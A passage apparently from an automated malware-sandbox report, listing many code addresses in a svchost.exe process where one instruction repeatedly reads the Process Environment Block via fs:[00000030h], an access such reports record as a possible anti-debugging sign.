            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]2_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
